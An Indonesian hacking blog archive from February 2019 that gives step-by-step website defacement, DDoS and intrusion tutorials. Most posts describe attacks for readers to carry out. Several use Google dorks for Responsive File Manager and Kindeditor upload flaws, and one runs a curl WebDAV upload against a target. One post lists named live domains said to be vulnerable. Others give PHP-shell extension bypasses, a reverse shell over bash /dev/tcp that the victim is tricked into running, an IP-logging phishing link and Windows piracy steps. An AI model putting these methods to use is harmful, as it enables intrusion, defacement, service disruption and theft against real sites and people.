Ads

Archive for February 2019


Assalamu'alaikum Wr. Wb.
Hae tod! Berjumpa lagi dengan w Look-t.
Dikesempatan saat ini w mau sharing tools temen ^-^

Tools ini dinamakan Pepescers Tools
Hak ciptanya jangan diganti ya gan
Kasian mereka yang coding sendiri
Ngecoding itu ngga semudah dapetin kamu :v

Comot kuy toolsnya

$ pkg update
$ pkg upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Pepescers
$ cd Pepescers
$ sh MTD.sh

Happy Recode gan ^-^
Ingat, Hak Cipta jangan diganti ya

Author Tool Pepescers : InYourG00D
Special thanks to : Look-t || Wannabe.ID || Extazy || ViJune15 || Tuan Swam

Oke sekian dulu dari saya.
Bila ada tutur kata yang kurang pantas dibaca.
Saya memohon maaf yang sebesar besarnya.
Saya akhiri, Wasalamu'alaikum Wr. Wb.

Tool Kumpulan Script Deface dan Shell Backdoor

Thursday, February 28, 2019
0 Comments

      Assalamu'alaikum Wr. Wb.
Hae tod! Bertemu lagi dengan saya Look-t. Dikesempatan saat ini saya akan memberikan tips agar Script Deface  anda memutar secara otomatis. Sebenarnya dulu ada konten yang sama mengenai ini tapi saya ingin merubahnya menjadi WARBAZAH !

Oke tod , silahkan anda tinggal copas codenya saja :)

<iframe width="0" height="0" src="link lagu ea" frameborder="0" allow fullscreen></iframe>


Saya sarankan penempatan Code Iframe-nya diatas tag <head>
Emangnya kenapa ? gapapa gapapa biar rapi aja :v


Oke terima kasih waktunya, bila ada tutur kata yang kurang enak dibaca.
Saya haturkan Mohon Maaf yang sebesar besarnya :*
Sekian, saya akhiri Wa salamualaikum Wr. Wb.

Iframe Autoplay For Script Deface

Wednesday, February 27, 2019
0 Comments

Kembali lagi dengan saya MarsHall kali ini saya akan memberikan pengetahuan seputar versi android dan pengertiannya yu simak...

  • Cupcake Android 1.5
Cupcake adalah versi ketiga Android yang dikembangkan oleh Google, rilis platform besar yang dapat disebarkan ke handset yang diberdayakan Android mulai Mei 2009, yang tidak lagi didukung. Rilis ini mencakup fitur-fitur baru untuk pengguna dan pengembang, serta perubahan dalam kerangka framework Android.
  • Donut Android 1.6
Donut adalah versi keempat dari sistem operasi seluler open source Android yang dikembangkan oleh Google yang tidak lagi didukung.
  • Eclair Android 2.0/2.1
Eclair adalah versi yang dihentikan dukungannya dari sistem operasi telepon genggam Android yang dikembangkan oleh Google. Diluncurkan pada tanggal 26 Oktober 2009, Android 2.1 dibangun berdasarkan perubahan signifikan yang dibuat oleh Android 1.6 "Donut".
  • Froyo Android 2.2
Froyo merupakan versi terbaru dari sistem operasi Android yang telah dirilis Google. Android 2.2 Froyo generasi ke tujuh dari platform smartphone berbasis open source. Nama kode Froyo, update ke tujuh dari platform Android.
  • Gingerbread Android 2.3
Gingerbread adalah versi yang dihentikan dukungannya dari sistem operasi telepon genggam Android yang dikembangkan oleh Google dan dirilis pada bulan Desember 2010. Rilis Gingerbread memperkenalkan dukungan untuk komunikasi jarak dekat dan inisiasi sesi protokol. 
  • Honeycomb Android 3.0
Honeycomb adalah versi yang dihentikan dukungannya dari platform Android yang dirancang untuk perangkat dengan ukuran layar yang lebih besar, terutama tablet. ... Honeycomb menggunakan versi 2.6.36 dari kernel Linux. 
  • Ice Cream Sandwich Android 4.0.3
Ice Cream Sandwich adalah versi dari Android mobile operating system yang dikembangkan oles Google.
  • Jelly Bean Android 4.2
Jelly Bean adalah versi kesepuluh Android dan nama kode yang diberikan kepada tiga rilis poin utama dari sistem operasi seluler Android yang dikembangkan oleh Google, mencakup versi antara 4.1 dan 4.3.1.
  • Kitkat Android 4.4
KitKat adalah versi dari sistem operasi telepon genggam Android yang dikembangkan oleh Google. Google mengumumkan Android 4.4 KitKat pada tanggal 3 September 2013. Meskipun pada awalnya di bawah nama sandi "Key Lime Pie", nama itu berubah karena "sangat sedikit orang benar-benar tahu rasa key lime pie." 
  • Lollipop Android 5.1
Lollipop adalah versi stabil terbaru dari sistem operasi Android yang dikembangkan oleh Google, yang pada saat ini mencakup versi antara 5.0 dan 5.1. 
  • Marsmallow Android 6.0


Marshmallow merupakan pemutakhiran yang akan datang untuk sistem operasi telepon genggamAndroid, kemungkinan besar akan dirilis pada  2015 ("sementara dijadwalkan untuk September"),dengan pratayang ketiga dan terakhir dirilis pada tanggal 17 Agustus 2015. Pertama diperkenalkan di Google I/O pada tanggal 28 Mei 2015, Marshmallow terutama akan berfokus pada perbaikan inkremental dan penambahan fitur lainnya.
  • Nougat Android 7.0
Android Nougat 7.0, 7.1, 7.1.1, 7.1.2 adalah pengganti dari Android Marshmallow, dan merupakan versi Android kedua terbaru yang telah dirilis. Versi ini diumumkan pada tanggal 1 Juli 2016, dan diluncurkan pada 23 Agustus 2016. 
  • Oreo Android  8.0
Android 8.0 Oreo adalah versi kedelapan dari sistem operasi Android mobile. Ini pertama kali dirilis sebagai preview pengembang ala kualitas pada tanggal 21 Maret 2017. 

Itulah versi android saat ini...
Cukup sekian dari saya mohon maaf bila ada kesalahan dan jangan lupa untuk di share ke teman-teman kalian agar mereka tau...

Tingkatan Versi Android

Kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan tutorial cara menambahkan efek petir di Script Deface. Anda inginkan bila Script anda terlihat lebih hidup :V yu simak aja :
  • Buka notepad kalian
  • Buka script yang akan ditambahkan efek petir
  • Copas kode ini dan simpan dimana saja kalo saya disimpan dibawah </head>
<style
type="text/css">body { background-image:
url(http://wonodadi.sideka.id/wp-content/uploads/sites/1335/2018/04/background-website-keren-gif-8.gif);
background-color:transparent; }
</style>
  • Nah tinggal copas saja
  • Kalo sudah muncul tinggal save
  • Done
Ya cukup sekian tutorial dari saya semoga bermanfaat dan jangan lupa untuk di share agar teman-teman anda tau... 

Cara Menambahkan Efek Petir Di Script Deface

Halo sobat kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan tutorial cara mengambil link lagu di SoundCloud untuk Script Deface gass langsung simak...


  • Search di browser tercinta kalian
  • SoundCloud
  • Setelah itu klik 
  • Terus cari lagu apa yang kalian inginkan disini saya akan mengambil lagu avenged Sevenfold
  • Nah ntar muncul banyak kalian pilih yang mana saja, saya pake yang atas kalo udh ada yang cocok tinggal klik aja
  • Setelah itu rubah peraturan browser anda menjadi situs desktop
  • Nah kalo sudah nanti tampilannya seperti ini
  • Setelah itu klik tombol share 
  • Yang berada dibawah tulisan write a comment
  • Nah jika sudah di klik nanti tampilannya seperti ini
  • Klik embed sob
  • Nah setelah itu salin angka/kode dibelakang kode /tracks yang berada dikolom code
  • Nih saya tandain
  • Nah yang itu kodenya
  • Btw tutorial ini nyambung dengan tutorial cara membuat Script Deface sederhana sebelumnya sob...
Cukup sekian tutorial dari saya semoga bermanfaat dan jangan lupa share ke teman-teman kalian agar mereka tau...

Cara Mengambil Link Lagu Di SoundCloud Untuk Script Deface

Tuesday, February 26, 2019
1 Comment

Assalamu alaikum Wr. Wb.
     Halo Makhluk Hidup :v
     Selamat bertemu lagi dengan saya Look-t , maaf saya jarang update dikarenakan ada masalah sesuatu di kehidupan nyata yang menyakitkan ini :(
Oke agan agan sekalian.
Dikesempatan hari ini saya akan membagikan tutorial cara mengaktifkan windows yang terkena aktifitasi produk ID.

Yups, kita mulai daripada kebanyakan basa basi nanti malah baper lalu ditinggalkan pergi :'(

  1. Pertama tama bacalah doa agar cracking ini menjadi jaya.
  2. Kedua Eksrak Filenya di luar folder, terserah mau ditaruh disk disebelah mana :v
  3. Ketiga jalankan software yang "KMSAuto x64.exe"
  4. INGAT!! sebelum menjalankan software pilih Run As Administrator
  5. Ingat baik baik gan
  6. Setelah itu langsung saja klik "Activate Windows"
  7. Wait and see a magic :v
  8. Btw, jika yang "KMSAuto x64.exe" itu tidak work
  9. Jalankan saja yang "KMSAuto.exe"
  10. Selesai 
  11. Happy enjoy my tips and trick
Beginilah tampilan softwarenya wahai simakers 


Tapi saya juga masih bingung, kenapa terkadang yang "KMSAuto x64.exe" tidak work ?
Mungkin karena PC agan itu PC kentang :v muehehehe canda euy jangan baper :v

Link Download Software KMS Auto Lite


Password apa gan ?
passwod : LookTechCorp


Terima kasih, atas kunjungannya jika ada tutur kata yang salah dari saya.
Saya haturkan Mohon maaf yang sebesar besarnya.
Sekian dari saya, Demikian saya akhiri.
Wa salamualaikum.Wr. Wb.

Cara Mengaktifkan Windows Yang Terkena Activate Product ID

Hallo sobat kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan informasi tentang deface ya...
Apakah sobat pernah upload shell tapi ditolak? Kalo pernah coba kalian pake cara ini dengan merubah ext .php menjadi jpg

Inilah contohnya :
  • shell.php.jpg
  • shell.php.pjepg
  • shell.php.;jpg
  • shell.php,jpg
  • shell.php.xxjpg
  • shell.jpg.php
  • shell.jpg~php
  • shell.php~jpg
  • .pjepg
Nah itulah contohnya, semoga bermanfaat. Jangan lupa share ke teman-teman kalian biar mereka tau...

Cara Merubah Shell Backdoor Php Menjadi Jpg

Sunday, February 24, 2019
0 Comments

Kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan informasi tentang virus Trojan horse. Disini saya akan menjelaskan apa itu Trojan horse dan apa akibatnya bila kena virus tersebut...

Trojan Horse disini adalah sebuah program yang memungkinkan komputer kita dikontrol orang lain melalui jaringan atau internet.

Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya, mereka dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri ber”lagak” sebagai utility program.

Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys(Korean)

Trojan Horse masih dapat dibagi lagi menjadi:

1. DOS Trojan Horse: Trojan Horse yang berjalan di DOS. Ia mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.

2. Windows Trojan Horse: Dijalankan di system Microsoft Windows. Jumlah Windows Trojan Horse meningkat sejak 1998 dan digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet.

Apa akibatnya bila terkena virus tersebut?

  • Suara Jadi Tidak Normal / Bahkan hilang
  • Monitor mati tanpa sebab
  • Always log off
  • Menghapus semua icon dalam dekstop
  • Menghapus fount dalam Windows
  • Print Takberfungsi
  • Disible windows firewall
  • Stop SQl Server
  • Mengclose IE dalam 10 menit
  • Disible Explor pada computer 
  • Layar menampilkan pesan yang tidak biasanya muncul
  • Memori yang tersedia lebihkecildari sebelumnya
  • Music atau suarnay tidak lazim terdengar secara acak
  • File menjadi rusak
  • Program atau file tidak bekerja normal
  • Perubahan properti system Dan masih banyak yang lainnya.
Cukup sekian informasi tentang virus Trojan Horse dari saya mohon maaf bila ada kesalahan. Jangan lupa share ke teman-teman kalian biar mereka tau...


Apa Itu Trojan Horse??

Friday, February 22, 2019
0 Comments

Hallo sob apa kabar? Saya harap kalian sehat selalu di kesempatan kali ini saya akan memberikan tutorial cara menambahkan lagu di script deface caranya cukup simple simak ya biar gak ada kesalahan....


  • Buka notepad kalian
  • Buka script deface kalian yang akan di tambahkan lagu
  • Copas kode ini
<embed src="http://www.youtube.com/v/Bk1ycWtZPHw&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
  • Simpan dibawah kode </title>
  • Setelah itu kalian copas lagi kode ini
<audio autoplay="autoplay" controls="controls" src="https://api.soundcloud.com/tracks/170553494/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" type="audio/mpeg"></audio>
  • Terserah mau anda simpan di bagian mana saya biasanya di simpan diatas kode </html>
  • Saya saranin pake SoundCloud karena disini saya juga memakainya knp? Karena simple gak ribet
  • Dan buat kalian kalo mau ganti lagunya. Edit angka di belakang tracks/
  • Angkanya sudah tersedia di link embed di SoundCloudnya
Cukup sekian tutorial dari saya semoga bermanfaat, jangan lupa share ke teman-teman kalian ya.

Cara Menambahkan Lagu Di Script Deface

Wednesday, February 20, 2019
0 Comments

Kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan tutorial cara membuat script deface sederhana menggunakan html.
Yu simak gan

  • Buka notepad kalian copas kode dibawah:

<html>
<head>
    <title>Page Title</title>
</head>
<body>

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html>

  • Selanjutnya kita membuat judul (title)
<HTML>
<head>
<title>hacked by MarsHall</title>
</head>
<body>

</body>
</HTML>

  • Jika backgroundnya pengen dikasih gambar kita edit bagian <body>
<html>
<head>
    <title>hacked by MarsHall</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html>

  • Sekarang bagian kata-kata bucin 
<html>
<head>
    <title>hacked by MarsHall</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>kata kata bucin lu</h1>
<p>nah disini masukin surat cinta kalian</p>

</body>
</html>

  • Kalo surat cinta kalian terlalu panjang bisa ditambahkan <p>kata-katanya</p>
<html>
<head>
    <title>hacked by MarsHall</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>kata kata bucin lu :V</h1>
<p>nah disini masukin surat cinta kalian</p>
<p> kyk gini</p>
</body>
</html>

Cukup sekian tutorial dari saya mohon maaf bila ada kesalahan. Jangan lupa share ke teman-teman kalian biar mereka pada tau....

Cara Membuat Script Deface Sederhana


Kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan tutorial DDos Attack dengan Termux. Yang belum tau apa itu DDos Attack, bisa di cek di tutorial saya sebelum
Kuy langsung simak :V

Alat-alat :

  1. Termux
  2. Kuota
  3. Nyali
  4. Sabun :V
Caranya :
  •  Ketik tools ini di termux anda
$pkg install git
$pkg install python
$git clone http://github.com/cyweb/hammer
$cd hammer
$python hyammer.py
$python3 hammer.py -s (IP adress web) -p 80 -t 135
Tanpa tanda ()
  •  Untuk mencari alamat IP nya user your brain :v


PENJELASAN :

bagian "-s" adalah IP adres targetnya ok?
bagiian "-p" adalah PORT weeb target... port default adalah 80
bagian "-t" adalah bagian untuk kiriman data kita ke web targetnya defaultnya 135

Cukup sekian yang dapat saya sampaikan support terus ya gan blog ini agar bisa memberikan tutorial yang lainnya, jangan lupa share ke teman-teman kalian...

Cara DDos Di Termux


DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu model dari DoS ( denial-of-service) attack.
Target serangan DoS attack bisa ditujukan ke berbagai bagian jaringan. Bisa ke routing devices, web, electronic mail, atau server Domain Name System.
Ada 5 tipe dasar DoS attack :
  1. Penggunaan berlebihan sumber daya komputer, seperti bandwith, disk space, atau processor.
  2. Gangguan terhadap informasi konfigurasi, seperti informasi routing.
  3. Gangguan terhadap informasi status, misalnya memaksa me-reset TCP session.
  4. Gangguan terhadap komponen-komponen fisik network.
  5. Menghalang-halangi media komunikasi antara komputer dengan user sehingga mengganggu komunikasi.


DoS attack juga termasuk eksekusi malware, yang dimaksudkan untuk :
  1. Memaksimalkan kerja processor, sehingga memblok tugas-tugas yang lain.
  2. Memicu terjadinya error di dalam microcode.
  3. Memicu error pada urutan instruksi dan memaksa komputer menjadi tidak stabil dan locked-up.
  4. Memanfaatkan error-error yang ada di system operasi yang berbuntut pada ‘kematian’ system.
  5. Membuat system operasi menjadi crash.
  6. iFrame (D)DoS, di dalamnya terdapat sebuah dokumen HTML yang sengaja dibuat untuk mengunjungi halaman web ber-kilobyte tinggi dengan berulang-ulang, hingga melampaui batas bandwith.


Gejala-gejala DDoS attack :

  1. Kinerja jaringan menurun. Tidak seperti biasanya, membuka file atau mengakses situs menjadi lebih lambat.
  2. Fitur-fitur tertentu pada sebuah website hilang.
  3. Website sama sekali tidak bisa diakses.
  4. Peningkatan jumlah email spam yang diterima sangat dramatis. Tipe DoS yang ini sering diistilahkan dengan “Mail Bomb”.
Cukup sekian tutorial dari saya semoga bermanfaat. Jangan lupa share ya...

Apa Itu DDos Attack?


Kembali lagi dengan saya MarsHall Gans :V di kesempatan kali ini saya akan memberikan tutorial membuat web Phising untuk alamat IP cara cukup mudah loh. Mau tau caranya? Mau gak? Mau ya :V yu simak Tod wkwkwk

  • Lu buka link ini gan https://grabify.link/
  • Nah jika sudah masuk tar ada kolom create url
  • Isikan bebas dengan nama apa aja mau nick, alamat rumah dll.. 
  • Saya disini menggunakan nama team




  • Nah jika sudah diisi kolomnya tinggal create URL gan :'v
  • Kalo sudah berhasil nanti tampilannya seperti ini
  • Tinggal sebar deh link yang ada dikolom new URL nya. Tinggal tunggu aja ada yang klik tuh link, kalo ada yang klik nanti muncul notifikasi....
Cukup sekian tutorial dari saya, mohon maaf bila ada kesalahan, gunakan dengan bijak dan jangan lupa share biar temen-temen lu pada tau :'v biar gak ngemis mulu hehehe....

Cara Membuat Web Phising Alamat IP

Monday, February 18, 2019
1 Comment


Kembali lagi dengan saya MarsHall di kesempatan kali ini saya akan memberikan tutorial seputar termux ea :V seperti judulnya saya akan memberikan tutorial sadap termux orang lain😱...
Saya jelaskan dulu sedikit, sebelum melanjutkan tutorial ini anda harus tau dulu apa itu sniffing aktif... Sniffing aktif adalah dimana kita itu satu jaringan kalo game itu satu room :V yuk lanjut ke tutorialnya...

Alat-alat :

  1. Termux gaes 
  2. Kuota 
  3. Hp android Kitkat ke atas karena dibawah Kitkat gak support termux
  4. Netcut (Not app)


Langkah-langkahnya :

  1. Buka termux lu :'v
  2. Ketik ini gan 
  3. $apt-get update && apt-get upgrade && apt-get install netcat (enter)
  4. $nc -l -p 1337 ( 1337 ) Adalah Port Yg Lu Pake .... Terserah Lu Isi Brp Asal 4 Angka Contoh : 1234
  5. Suruh target untuk membuka termuxnya dan suruh ketik ini
  6. bash -i > /dev/tcp/127.0.0.1/1337 0<&1 2>&1
  7. Ubah (127.0.0.1) dengan alamat IP lu sendiri 
  8. Tunggu si target ketik itu ditermuxnya kalo berhasil ntar muncul tanda ($) kadang suka gak muncul walaupun si target sudah mengetik nya juga :v
  9. Kalo bener-bener si target sudah mengetik yang tadi dan gak muncul tanda $ kamu bisa langsung ketik ini
  10. $cd /sdcard && ls
  11. Nah ntar muncul isi penyimpanan hp si target :'v
Cukup sekian Tutorial dari saya, ingat jangan disalah gunakan ya :V mohon maaf bila ada kesalahan. Jangan lupa share biar pada tau...

Cara Sniffing Termux Orang Lain


Hi ! Assalamualaikum Wr. Wb.
     Kembali lagi dengan saya Look-t
     Disempatan saat ini saya akan memberikan tutorial Deface POC Responsive File Manager

Bahan dan Alat

  1. Script Deface
  2. Gadget
  3. Kuota dan Sinyal yang mendukung
  4. Doa 
      Okey kita mulai saja

Dorknya :

inurl:/filemanager/ intext:dialog.php
              ( silahkan kembangkan sendiri agar mendapatkan target yang indah )


Kita langsung praktek saja

  • Ketikan Dork diatas di mesin pencarian Google
  • Setelah tersearch
  • Kalian pilih site yang sekiranya kalian itu vuln
  • Habis itu cek Screenshot dibawah 




  • Nah jika vuln
  • Akan muncul tampilan seperti gambar diatas
  • Kalian pilih/klik Dialog.php
  • Maka tampilannya seperti berikut

  • Untuk tempat Upload Script Defacenya silahkan cek  yang saya panahin
  • Setelah kalian Upload, kita akses Script seperti berikut



  • Untuk pengguna Handphone tanda </> itu kalian tahan sampai keluar pop up seperti  itu
  • Untuk pengguna Personal Computer tanda </> kalian klik kanan pada bagian tengahnya untuk menampilkan pop upnya
  • Setelah keluar Pop up kita pilih "Show URL" akan muncul seperti berikut

  • Itu adalah Akses Script Defacenya tinggal kalian klik Copy dan selesai

Ini contoh hasil dari saya :
  


     
      Sekian dulu dari saya jika ada tutur kata yang kurang sopan saya haturkan Maaf yang sebesar besarnya 
Terima kasih, Saya akhiri Wassalamualaikum Wr. Wb.





Deface Metode/POC Responsive File Manager

Monday, February 11, 2019
3 Comments



Hi, Assalamualaikum Wr. Wb.
Saya Look-t si Admin kedua di kesempatan kali ini saya akan memberikan tutorial Deface Metode/POC Kindeditor
Selamat menyimak

Bahan:
  1. Script deface
  2. Kuota 
  3. Sinyal
  4. Gadget
Dork nya :
                     Inurl:uploadbutton.html

Langsung praktek :
  1. Search di Google dengan Dork diatas 
  2. Cari site yang menurut anda Vuln 
  3. Jika anda melihat kolom Upload
  4. Upload Script Deface anda 
  5. Jika sudah Anda Upload
  6. Pastikan  kolom kotak tadi terisikan sebuah Exploit
  7. Langsung saja Anda copy text yang berada di kolom tersebut
  8. Kalo sudah anda copy Pastekan dibelakang sitenya
Nih gini aksesnya

  1. http://mmedi.cc/Public/js/kindeditor/examples/uploadbutton.html
  2. Kita hapus sampai site 
  3. Seperti ini : http://mmedi.cc
  4. Dan kita pastekan Exploit akses Script tadi
  5. Dan hasilnya seperti ini
  6. http://mmedi.cc/Public/js/kindeditor/attached/file/20190211/20190211012945_38575.html
  7. Selesai Anda telah mempelajarinya
Sekian dulu dari saya, jika ada tutur kata yang menyinggung Anda saya mohon maaf yang sebesar besarnya
Demikian saya akhiri dan sampai jumpa lagi
Wasalamualaikum Wr. Wb.

Deface Metode/POC Kindeditor

Sunday, February 10, 2019
5 Comments
Kembali lagi diblog gw kali ini. Kali ini gw bakalan ngasih tutorial cara mengaktifkan perisai fb caranya cukup mudah sobat tanpa vpn...

Sebelum menuju ke tutorial saya mau jelasin dulu kelebihan memakai perisai ini foto profil gak bisa disave oleh orang lain atau di screenshot...
Yu simak.

  • Anda harus mencari token akun fbnya terlebih dahulu 
  • Caranya gimana?
  • Masuk ke link ini
http://sidoliker.xyz/



  • Tar klik (click here) To Get Access Token
  • Tar login dengan akun fb anda tar akan muncul token akun fb kamu
  • Setelah itu salin token fb nya dari EAAblalalala
  • Setelah disalin terus pastenkan di link ini
http://sidoliker.xyz/guard/



  • Pastekan token fb anda dikolom tersebut
  • Setelah itu klik perform
  • Jika berhasil nanti bakalan muncul ceklis warna hijau...
Cukup sekian tutorial dari saya semoga bermanfaat. Jangan lupa share ke temen-temen kalian semua...

Cara Mengaktifkan Picture Guard Di Akun Facebook

Tuesday, February 5, 2019
4 Comments
Halo gan kembali lagi di blog gw. Kali ini gw bakalan ngasih kumpulan tools termux TU4N B4DUT kalian kenal dia? Dia kacung gw wkwkwk :v canda dut...
Nih cuk :

```TOOLS TUAN B4DUT```
■■■*SCANNING SUBDOMAIN*■■■
■■■■■■■■■■■■■■■■■■■■■■■■

$ apt upgrade && apt update
$ pkg install figlet curl git python python2
$ pip2 install lolcat
$ git clone https://github.com/TUANB4DUT/SUBDO
$ cd SUBDO
$ chmod 777 subdo.sh
$ ./subdo.sh

■■■■■■■■■■■■■■■■■■■■■■■
*UNTUK MENCARI DIREKTORI WEBSITE*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```pip2 install dirhunt```
```git clone https://github.com/TUANB4DUT/DIRHUNT```
```cd DIRHUNT```
```chmod 777 DIRHUNT.sh```
```./DIRHUNT.sh```

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS INI UNTUK MENCARI DIR WEBSITE*
■■■■■■■■■■■■■■■■■■■■■■■■
*NOTE : TIDAK SEMUA SITE BISA DI SCAN*

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/DIR```
```cd DIR```
```chmod 777 dir.sh```
```./dir.sh```

*#BEASMARTPEOPLE*

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS UNTUK DEFACE METHOD WEBDAV*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```pkg install curl```
```git clone https://github.com/TUANB4DUT/WEBDAV```
```cd WEBDAV```
```chmod 777 webdav.sh```
```./webdav.sh```


```cat WebLiveTarget.txt``` >> *UNTUK MELIHAT WEB VULN WEBDAV*

*#BEASMARTPEOPLE*

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS INI UNTUK REVERSE IP*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/REVERSEIP```
```cd REVERSEIP```
```chmod 777 REVERSEIP.sh```
```./REVERSEIP.sh```

*#BEASMARTPEOPLE*

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS UNTUK MENDAPATKAN INFORMASI IP*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/TRACKIP```
```cd TRACKIP```
```chmod 777 TRACKIP.sh```
```./TRACKIP.sh```

*#BEASMARTPEOPLE*

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS INI UNTUK MELIHAT DNS WEBSITE*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/DNSLOOKUP```
```cd DNSLOOKUP```
```chmod 777 DNSLOOKUP.sh```
```./DNSLOOKUP.sh```

*#BEASMARTPEOPLE*


■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS INI UNTUK MELIHAT INFORMASI WEBSITE*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/WHOIS```
```cd WHOIS```
```chmod 777 WHOIS.sh```
```./WHOIS.sh```

*#BEASMARTPEOPLE*

■■■■■■■■■■■■■■■■■■■■■■■■
*FUNGSI TOOLS INI UNTUK MENCARI SITE 1 HOST*
■■■■■■■■■■■■■■■■■■■■■■■■

```apt upgrade && apt update```
```pkg install git```
```pkg install figlet python2```
```pip2 install lolcat```
```git clone https://github.com/TUANB4DUT/REVERSEDNS```
```cd REVERSEDNS```
```chmod 777 REVERSEDNS.sh```
```./REVERSEDNS.sh```

*#BEASMARTPEOPLE*
■■■■■■■■■■■■■■■■■■■■■■■■
*400++ IN 1🤤🤤*
*TUAN B4DUT TOOLS*
*TOOLS INSTALLER*
■■■■■■■■■■■■■■■■■■■■■■■■
```TOOLS INI CUMAN UNTUK MENGINSTALLNYA SAJA
JIKA MAU MENJALANKAN TOOLS YANG KALIAN INSTALL
SILAHKAN KETIK 00 LALU KETIK ls
DAN MASUK KE TOOLS YANG KALIAN INSTALL```

*GUNA TOOLS INI UNTUK MENGINSTALL TOOLS LAIN*

*COPY & PASTE COMMANDNYA*

```MENGINSTALLNYA```

$apt update && apt upgrade
$pkg install python python2 vim figlet curl
$pkg install php
$pip2 install lolcat
$pkg install git
$git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv4

```MENJALANKANNYA```

$cd TOOLSINSTALLERv4
$ls
$chmod 777 TUANB4DUT..sh
$./TUANB4DUT..sh

*[TITIKNYA 2(TUANB4DUT..sh)]*

*GUNAKAN DENGAN BIJAK*
*CERDAS DALAM BERKATA*
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

Nah itulah tools TU4N B4DUT gunakan dengan bijak ya. Jangan lupa share ke temen-temen lu semua ok tq....

Terimakasih untuk TU4N B4DUT dan untuk Team Indonesian Termux Association

Kumpulan Tools Termux TU4N B4DUT

Saturday, February 2, 2019
0 Comments
Kembali lagi dengan gw Marshall tentunya di kesempatan kali ini gw bakalan ngasih tutorial deface poc Webdav :V buat yang baru belajar deface ini sangat mudah dan tidak ribet tentunya...
Yu kita simak....


  • Yang pertama jika kalian hanya ingin titip file doang bisa menggunakan nama file bebas misalnya (buriq.html) kalau mau tebas index. Harus menggunakan index.html nama filenya sob
  • Buka termux anda terus ketik command ini sob...


$ pkg update 


$ pkg upgrade

$ pkg install curl
  • Nah bila sudah terinstal tinggal deface lah cuk :v
  • Caranya gimana? Nih gini
  • Oh iya sebelum itu simpan script deface lu di penyimpanan internal dan diluar folder ya gayn
  • Nah kalo sudah tinggal nge deface aja
$ curl -T /storage/emulated/0/namasc.html http://target.co.li/
  • Nah jika berhasil akan muncul $ kalo gak muncul berarti webnya gak vuln gan :v
  • Jika berhasil cara aksesnya gimana?? Gini cuk http://target.co.li/namasclu.html
Gimana?? Mudah kan
Mungkin cukup sekian yang bisa saya sampaikan mohon maaf bila ada kesalahan. Jangan lupa share ke teman-teman lu semua ya tq...

Deface Poc Webdav Di Termux

Kembali lagi di blog gw. Kali ini gw mau ngasih web vuln poc webdav :v mau gak? Ya pasti mau kan wkwkwk....
Nih comot ae gw kan baik ea :voos


http://braziliansandalco.co.za
http://xposurephotography.co.za/
http://cblandscapes.co.za/
http://aquafitness.za.net
http://techdirect.co.za
http://tcnig.co.za
http://tankertech.co.za
http://tcmgroup.co.za
http://systemshouse.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thepremiummakers.com
http://thembelahome.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://tressor.co.za
http://ziady.com
http://paradiseyouthclub.com
http://kabby.tk
http://dryfaden.com
http://beydagida.com
http://ariquemesagencia.com.br
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
Http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://opiniong.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
